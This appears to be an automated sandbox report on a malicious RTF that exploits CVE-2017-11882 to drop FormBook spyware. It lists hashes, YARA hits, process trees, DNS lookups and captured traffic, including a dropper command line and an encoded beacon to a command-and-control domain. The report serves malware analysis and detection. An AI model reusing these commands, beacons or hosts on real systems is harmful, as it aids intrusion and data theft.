http://www.autoitscript.com/autoit3 | explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://support.mozilla.org | explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.piriform.com/ccleanerv | explorer.exe, 0000000A.00000000.988586812.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1006236115.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.968187098.0000000004385000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Client.exe, 00000005.00000002.947458698.0000000002671000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://servername/isapibackend.dll | explorer.exe, 0000000A.00000000.1008328661.0000000006450000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
IP | Domain | Country | ASN | ASN Name | Malicious
45.33.6.223 | www.sqlite.org | United States | 63949 | LINODE-AP Linode LLC US | false
45.33.18.44 | www.magadirect.co.uk | United States | 63949 | LINODE-AP Linode LLC US | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 680332
Start date and time: 2022-08-08 12:06:10 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520 (renamed file extension from 1520 to rtf)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winRTF@11/9@4/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 22.2% (good quality ratio 20.9%)
• Quality average: 69.8%
• Quality standard deviation: 30%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryAttributesFile calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtSetInformationFile calls found
Time | Type | Description
12:07:15 | API Interceptor | 38x Sleep call for process: EQNEDT32.EXE modified
12:07:17 | API Interceptor | 176x Sleep call for process: Client.exe modified
12:07:39 | API Interceptor | 6x Sleep call for process: notepad.exe modified
12:08:23 | API Interceptor | 356x Sleep call for process: NAPSTAT.EXE modified
12:09:04 | API Interceptor | 1x Sleep call for process: explorer.exe modified
No context
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 962560
Entropy (8bit): 7.212114876878578
Encrypted: false
SSDEEP: 12288:rH/hLzLfhhDL1RJj2Y77Jk0dMjLA3PFqO8vUMFsPwBjA32fBE:b/N5hDLr5dk02j8FkvHBjAYE
MD5: 426E7D731C2BA1BD9534EB8F737CDEAF
SHA1: C6DDBF5EC6281C716B47BE2F043B2E6ACDEF3CF4
SHA-256: A59D7D77C0A6B59BEA96AD8E4D32B42AD1EC4DEEC31590940CC0A373978C2E2D
SHA-512: 165520C163AAFCFECD5DF204D2CD2805B0D180C0864A666365AF06DB470398C9D29B1C035DFA217B22630E930420697562830989F67EBB0C6F1B2DA0E2A8B5F8
Malicious: true
Yara Hits:
• Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, Author: John Davison
• Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, Author: ReversingLabs
Antivirus:
• Antivirus: Avira, Detection: 100%
Reputation: low
                                                  Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R...Q........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 1.1722028273607172
Encrypted: false
SSDEEP: 6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
MD5: 75FCAEF5B6C0ADE6AF66F49874853C6A
SHA1: 834FA72EEF104773D7052895798FED035EF01594
SHA-256: 01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
SHA-512: 5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
Malicious: false
Reputation: moderate, very likely benign file
                                                  Preview:..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 948736
Entropy (8bit): 7.246077385861013
Encrypted: false
SSDEEP: 12288:mH/hLzLfhhDL1RJj2Y77Jk0dMjLA3PFqO8vUMFsPwBjA32fBE:A/N5hDLr5dk02j8FkvHBjAYE
MD5: D94161753531177B2FB80365ADDCBFA8
SHA1: 560C1FB1BF46B5144896570B228C7189B187ED7F
SHA-256: A5FC090CA6391A09E1DD85FF29F9D3F25300829DE6C74426EA0C142A56EABC1D
SHA-512: 957DCD9145153D77D26FA9066ADAAD1336977144AC02A1E9E00971A2AE2A07820B787AF0237A1B97567F6935CF4C5B51F79D863879D9A179AFC0FFD18BEEE1E1
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 22%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.b.........."...0..>...8...........`... ....@.. ....................................@.....................................W....................................................................................................`..H...........b..dzG4e.,... ......................@....text....;...`...<...2.............. ..`.rsrc................n..............@..@.....................v.............. ..`.reloc...............x..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:gAWY3n:qY3n
MD5: FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1: D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256: EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512: AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious: true
                                                  Preview:[ZoneTransfer]..ZoneId=3..
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 8 18:07:02 2022, mtime=Mon Aug 8 18:07:02 2022, atime=Mon Aug 8 18:07:12 2022, length=2883613, window=hide
Category: dropped
Size (bytes): 1204
Entropy (8bit): 4.569449910987798
Encrypted: false
SSDEEP: 24:8/N4ylhn/XTRKJkJHCn9Dze4HCn9DmDv3q6u7D:8fhn/XT04HCn1lHCnz60D
MD5: 70A36B224D1C572B995BD556EF759DB3
SHA1: 0CA78EEFCB96BD578DC302DAD8D06C6B13886761
SHA-256: 05A6062747A4BB44506A265B36A2C5CD6FE3337B57B8D141994725F8345620C8
SHA-512: 39C2C4AEDC51017041F05D32BF9FB227C60604C4604EAF30BDCE7B7EBE838B326D8FBD1E3352BF24219C420605D0A77A8AC722AB62B3B950A3744E11BD226984
Malicious: false
                                                  Preview:L..................F.... .......Z.......Z....6..Z.....,..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U...Desktop.d......QK.X.U.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...,..U. .SECURI~1.RTF..........U..U.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.2.3.9.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\048707\Users.user\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf.K.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.2.3.9.5...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 148
Entropy (8bit): 4.980743826841669
Encrypted: false
SSDEEP: 3:bDuMJluscbcTLqjQWC0LULeBCmxW9rbcTLqjQWC0LULeBCv:bCVwTeS0LCeBgrwTeS0LCeBs
MD5: F5B5C7A44D064A168B55B6546BEB143F
SHA1: DF650FE24365C0DF6B059F048104A0E458C87E56
SHA-256: A102AB1C9E3EE964697863D84AEADD8D4D36BA057DF75DC66AB8CED753A20090
SHA-512: 9AAACF55B9357FC3E282C44D6E5E9514AEC3D7FCFC8FE60F0CE01A9EA92CA9729081CFC7896C411686D2E0C03729B5D72CA22F1D645634440A41145B6434E762
Malicious: false
                                                  Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK=0..
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.503835550707525
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5: D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1: 23684CCAA587C442181A92E722E15A685B2407B1
SHA-256: 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512: 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious: false
                                                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.503835550707525
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5: D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1: 23684CCAA587C442181A92E722E15A685B2407B1
SHA-256: 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512: 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious: false
                                                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
File type: Rich Text Format data, version 1, unknown character set
Entropy (8bit): 4.78563050775552
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
File size: 2883613
MD5: 26111b2647fc8b1e3e123e825f716b94
SHA1: 131907f569a2774c1800430ccf052896dc685ec0
SHA256: 7d4a1c05f377343f063e0b265fc85f928b59f0cd88914f2b2715c4a25c734838
SHA512: 44c6bdb04ac725f0d73f53e4b770502033171213e0194899e781df10f9e2d3e80d50985f1c0500feda91f76948c1f04fa3a6713aab36d76c135b7df736ef23d3
SSDEEP: 24576:tSRlUCdvKN2W0fKMjy7qXpGjbqi1VzEjCpqdf9bSrdMymS1W:c
TLSH: 99D5A570B1B535C6E26F0172429FBC59521738C7B3C62D88811DEAF62ED4B7A7B41A0E
                                                  File Content Preview:{\rtf1{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnhang {\pnt
Icon Hash: e4eea2aaa4b4b4a4
Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 0000128Dh | 2 | embedded | Package | 948903 | Client.exe | C:\Path\Client.exe | C:\Path\Client.exe | no
1 | 001DF7BDh | 2 | embedded | Equation.3 | 3072 | | | | no
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 12:08:49.397722006 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
Aug 8, 2022 12:08:49.539129972 CEST | 80 | 49171 | 45.33.18.44 | 192.168.2.22
Aug 8, 2022 12:08:49.539345026 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
Aug 8, 2022 12:08:49.539773941 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
Aug 8, 2022 12:08:49.683424950 CEST | 80 | 49171 | 45.33.18.44 | 192.168.2.22
Aug 8, 2022 12:08:49.683451891 CEST | 80 | 49171 | 45.33.18.44 | 192.168.2.22
Aug 8, 2022 12:08:49.683665991 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
Aug 8, 2022 12:08:49.683860064 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
Aug 8, 2022 12:08:49.827022076 CEST | 80 | 49171 | 45.33.18.44 | 192.168.2.22
Aug 8, 2022 12:09:09.413953066 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
Aug 8, 2022 12:09:09.555061102 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
Aug 8, 2022 12:09:09.555181980 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
Aug 8, 2022 12:09:09.556029081 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
Aug 8, 2022 12:09:09.697192907 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
Aug 8, 2022 12:09:09.698842049 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
Aug 8, 2022 12:09:09.698944092 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
Aug 8, 2022 12:09:09.698975086 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
Aug 8, 2022 12:09:09.699006081 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
Aug 8, 2022 12:09:09.721349955 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
Aug 8, 2022 12:09:09.862656116 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 12:08:49.188456059 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Aug 8, 2022 12:08:49.348788977 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Aug 8, 2022 12:09:09.352061987 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
Aug 8, 2022 12:09:09.386590958 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Aug 8, 2022 12:09:09.732258081 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
Aug 8, 2022 12:09:09.754498959 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
Aug 8, 2022 12:09:14.764194012 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
Aug 8, 2022 12:09:14.786825895 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 8, 2022 12:08:49.188456059 CEST | 192.168.2.22 | 8.8.8.8 | 0xceee | Standard query (0) | www.magadirect.co.uk | A (IP address) | IN (0x0001)
Aug 8, 2022 12:09:09.352061987 CEST | 192.168.2.22 | 8.8.8.8 | 0xca44 | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001)
Aug 8, 2022 12:09:09.732258081 CEST | 192.168.2.22 | 8.8.8.8 | 0xc4a9 | Standard query (0) | www.luanaterra.online | A (IP address) | IN (0x0001)
Aug 8, 2022 12:09:14.764194012 CEST | 192.168.2.22 | 8.8.8.8 | 0xca6d | Standard query (0) | www.hogogala.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.18.44 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 72.14.185.43 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.30.197 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.20.235 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.79.19.196 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.56.79.23 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 96.126.123.244 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 72.14.178.174 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 198.58.118.167 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 173.255.194.134 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.23.183 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.2.79 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:09:09.386590958 CEST | 8.8.8.8 | 192.168.2.22 | 0xca44 | No error (0) | www.sqlite.org | | 45.33.6.223 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:09:09.754498959 CEST | 8.8.8.8 | 192.168.2.22 | 0xc4a9 | Name error (3) | www.luanaterra.online | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:09:14.786825895 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | www.hogogala.com | | 162.213.253.236 | A (IP address) | IN (0x0001)
                                                  • www.magadirect.co.uk
                                                  • www.sqlite.org
                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  0 | 192.168.2.22 | 49171 | 45.33.18.44 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Aug 8, 2022 12:08:49.539773941 CEST | 1 | OUT | GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1
                                                  Host: www.magadirect.co.uk
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Aug 8, 2022 12:08:49.683424950 CEST | 1 | IN | HTTP/1.1 404 Not Found
                                                  server: openresty/1.13.6.1
                                                  date: Mon, 08 Aug 2022 10:08:49 GMT
                                                  content-type: text/html
                                                  content-length: 175
                                                  connection: close
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  1 | 192.168.2.22 | 49172 | 45.33.6.223 | 80 | C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Aug 8, 2022 12:09:09.556029081 CEST | 2 | OUT | GET /2014/sqlite-dll-win32-x86-3080700.zip HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: www.sqlite.org
                                                  Connection: Keep-Alive
                                                  Aug 8, 2022 12:09:09.698842049 CEST | 3 | IN | HTTP/1.1 404 Not Found
                                                  Connection: close
                                                  Date: Mon, 08 Aug 2022 10:09:09 GMT
                                                  Content-type: text/html; charset=utf-8
                                                  Data Ascii: <head><title lineno="390">Not Found</title></head><body><h1>Document Not Found</h1>The document /2014/sqlite-dll-win32-x86-3080700.zip is not available on this server</body>



                                                  Target ID: 0
                                                  Start time: 12:07:13
                                                  Start date: 08/08/2022
                                                  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit): false
                                                  Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                  Imagebase: 0x13f9e0000
                                                  File size: 1423704 bytes
                                                  MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: high

                                                  Target ID: 2
                                                  Start time: 12:07:15
                                                  Start date: 08/08/2022
                                                  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit): true
                                                  Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase: 0x400000
                                                  File size: 543304 bytes
                                                  MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: high

                                                  Target ID: 3
                                                  Start time: 12:07:16
                                                  Start date: 08/08/2022
                                                  Path: C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: CmD.exe /C %tmp%\Client.exe A C
                                                  Imagebase: 0x4a690000
                                                  File size: 302592 bytes
                                                  MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: high

                                                  Target ID: 5
                                                  Start time: 12:07:16
                                                  Start date: 08/08/2022
                                                  Path: C:\Users\user\AppData\Local\Temp\Client.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                  Imagebase: 0x1180000
                                                  File size: 948736 bytes
                                                  MD5 hash: D94161753531177B2FB80365ADDCBFA8
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: .Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 22%, ReversingLabs
                                                  Reputation: low

                                                  Target ID: 9
                                                  Start time: 12:07:32
                                                  Start date: 08/08/2022
                                                  Path: C:\Windows\SysWOW64\notepad.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
                                                  Imagebase: 0x570000
                                                  File size: 179712 bytes
                                                  MD5 hash: A4F6DF0E33E644E802C8798ED94D80EA
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
